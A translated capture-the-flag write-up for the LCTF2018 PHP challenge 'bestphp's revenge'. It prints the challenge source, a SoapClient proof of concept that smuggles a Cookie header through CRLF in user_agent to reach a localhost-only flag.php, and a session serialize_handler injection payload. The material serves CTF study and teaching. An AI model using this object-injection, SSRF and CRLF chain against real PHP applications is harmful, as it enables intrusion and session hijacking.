Problem-solving log: [LCTF] bestphp's revenge
Challenge replay link: https://buuoj.cn/challenges
Reference link: https://xz.aliyun.com/t/3341#toc-22
See also: PHP deserialization as seen from the LCTF web warm-up problem
See also: LCTF2018 bestphp's revenge detailed writeup
Is this really an LCTF web warm-up problem?? Excuse me. Lately I have been doing one problem a day and am falling a bit behind...
I. Knowledge points
These knowledge points link into one chain, so I will go through them in that order:
session deserialization -> SOAP (SSRF + CRLF) -> call_user_func triggering the SoapClient
1. SoapClient deserialization leading to SSRF
2. Session injection caused by session.serialize_handler processing the session in different ways
3. CRLF injection
II. Approach
First, when PHP deserialization offers no usable user-defined class, PHP native classes can be used instead; for reference see "Using PHP native classes in deserialization".
Source and PoC:
//index.php
<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET['f'], $_POST);   // any function name from f is called with $_POST as its argument
session_start();
if(isset($_GET['name'])){
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');   // first session value + a fixed string
call_user_func($b, $a);   // implode($a) unless $b has been overwritten
?>
//flag.php
<?php
session_start();
echo 'only localhost can get flag!';
$flag = 'LCTF{*************************}';
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){
    $_SESSION['flag'] = $flag;   // the flag is written into the session of the request coming from localhost
}
Visiting flag.php directly only prints: only localhost can get flag!
It is easy to think of passing f=extract to overwrite $b with the function we want; the problem is how to make use of the session afterwards.
Let us talk about SoapClient first.
For reference see "SOAP security issues seen from a few CTF problems".
SOAP (Simple Object Access Protocol) is a protocol for communication between a client and a Web service, or between Web services.
It uses HTTP as the underlying transport protocol and XML as the data format.
SOAP messages are basically one-way transmissions from a sender to a receiver, but they are often combined into a request/response pattern.
So if we can make a deserialized SoapClient send a request to flag.php, we achieve SSRF.
The problems I need to solve are:
- Where the deserialization is triggered
- How to control the deserialized content
Here we need to know that when call_user_func() receives an array as its parameter, the members of the array are treated as the class name and the method name. For this problem, we can start by using extract() to overwrite $b with call_user_func. reset($_SESSION) is $_SESSION['name'], so we can pass name=SoapClient; then the final call_user_func($b, $a) becomes call_user_func(array('SoapClient','welcome_to_the_lctf2018')), that is, call_user_func(SoapClient->welcome_to_the_lctf2018). Because the SoapClient class has no method welcome_to_the_lctf2018, the magic method __get() is invoked, which sends the request.
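To see this callable resolution in action, here is an added example (not the challenge's own code) that replays the index.php chain with $_GET, $_POST and $_SESSION constructed inline. The SoapClient's location is an assumed closed local port, so the only observable effect is the SoapFault showing that a request was attempted.

```php
<?php
// Added example, not the challenge's own code: replays the call chain of
// index.php with the request and session data constructed inline.
$_GET     = ['f' => 'extract'];          // step 1: f=extract
$_POST    = ['b' => 'call_user_func'];   // step 2: extract() will overwrite $b
$_SESSION = ['name' => new SoapClient(null, [
    'location' => 'http://127.0.0.1:1/', // assumption: nothing listens on this port
    'uri'      => 'urn:demo',            // constructed, any value works in non-WSDL mode
])];

$b = 'implode';
call_user_func($_GET['f'], $_POST);      // extract(['b' => 'call_user_func'])
var_dump($b);                            // string(14) "call_user_func"

// reset($_SESSION) is the SoapClient object; the array becomes a callable
$a = [reset($_SESSION), 'welcome_to_the_lctf2018'];
try {
    call_user_func($b, $a);              // call_user_func([$soap, 'welcome_to_the_lctf2018'])
} catch (SoapFault $e) {
    // SoapClient has no such method, so its magic handler tried to POST to 'location'
    echo get_class($e), ': ', $e->getMessage(), "\n";
}
```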
So how do we control the content of the SoapClient? Here is the PoC from the reference writeup:
<?php
$target = "http://127.0.0.1/flag.php";
$attack = new SoapClient(null, array('location' => $target,
    // the \r\n inside user_agent injects an extra Cookie header into the HTTP request
    'user_agent' => "N0rth3ty\r\nCookie: PHPSESSID=tcjr6nadpk3md7jbgioa6elfk4\r\n",
    'uri' => "123"));
$payload = urlencode(serialize($attack));
echo $payload;
CRLF is also involved here; for reference see "[Reserved] CRLF Injection vulnerability analysis and usage examples". My understanding is that when an HTTP request contains two \r\n, in other words %0d%0a, the first half is parsed as the header and the remaining part as the body, so if the header is controllable, CRLF injection can modify the HTTP request packet. If my understanding is wrong, please correct me.
In the PoC, the CRLF is used to forge a request to flag.php and have the result saved into the session PHPSESSID=tcjr6nadpk3md7jbgioa6elfk4 carried by the injected cookie.
Finally, how do we make the content that PHP deserializes controllable? This involves PHP's session mechanism.
PHP does not keep session content in memory; it is stored in files. The storage method is determined by the configuration item session.save_handler, and files are the default.
The files are named sess_<sessionid>, and their content is the serialized form of the session values.
There are three relevant configuration items in php.ini:
session.save_path="" -- sets the session storage path
session.save_handler="" -- sets a user-defined storage function; use this if you want something other than PHP's built-in session storage (a database, etc.)
session.serialize_handler string -- defines the name of the handler used to serialize/deserialize. The default is php (changed to php_serialize after 5.5.4)
PHP's built-in handlers are used to serialize and deserialize $_SESSION data when it is stored. They are not often discussed, and correspond to three different storage formats:
Handler | Corresponding storage format
---|---
php | key name + vertical bar "|" + value processed by serialize()
php_binary | key length as an ASCII character + key name + value processed by serialize()
php_serialize (php>=5.5.4) | the whole array processed by serialize()
The handler used for serializing and deserializing can be set through the session.serialize_handler configuration option.
If PHP stores $_SESSION data with one handler and deserializes it with a different one, the data cannot be deserialized correctly, and with specially crafted input arbitrary data can be forged.
When the session is stored with php_serialize and later processed with php: if the injected data is a=|O:4:"test":0:{}
, the session content is a:1:{s:1:"a";s:16:"|O:4:"test":0:{}";}
. The php handler then parses a:1:{s:1:"a";s:16:"
as the key, and the test object after the | is injected.
The call_user_func at the start of the script is otherwise unused, so we can use it to construct session_start(['serialize_handler'=>'php_serialize'])
and achieve the injection.
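The handler mismatch above can be reproduced offline. The following is an added example, not code from the original writeup: it emulates the on-disk format of the php_serialize handler and a simplified read-back by the php handler, using the injected value from the text.

```php
<?php
// Added example, not from the original writeup: emulates the two session
// handlers' formats so the injection can be studied without a web server.
class test {}

// php_serialize handler: the whole $_SESSION array goes through serialize().
function encode_php_serialize(array $session): string {
    return serialize($session);
}

// Correct read-back with the same handler: plain unserialize() of the array.
function decode_php_serialize(string $data): array {
    return unserialize($data);
}

// php handler: "key|serialized value" pairs. Simplified to a single pair; the
// real decoder consumes one value and scans for the next '|', and since nothing
// after the injected object contains a '|', it stops there as well.
function decode_php(string $data): array {
    $pos = strpos($data, '|');
    if ($pos === false) {
        return [];
    }
    $key   = substr($data, 0, $pos);
    // trailing '";}' is ignored by unserialize() (PHP 8.3+ emits a warning)
    $value = unserialize(substr($data, $pos + 1));
    return [$key => $value];
}

// Constructed injected value, exactly as in the text: a=|O:4:"test":0:{}
$stored = encode_php_serialize(['a' => '|O:4:"test":0:{}']);
echo $stored, "\n";                      // a:1:{s:1:"a";s:16:"|O:4:"test":0:{}";}

var_dump(decode_php_serialize($stored)); // same handler: 'a' => a harmless string
var_dump(decode_php($stored));           // php handler: key 'a:1:{s:1:"a";s:16:"' => object(test)
```

The second var_dump is the point: the same bytes that are a plain string under one handler become a deserialized object under the other, which is why session_start()'s serialize_handler option must never be attacker-controlled.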
III. Solution steps
First, inject the PoC payload into the session.
Then trigger the deserialization so that the SoapClient sends its request.
Finally, access the page with the cookie from the PoC to obtain the flag.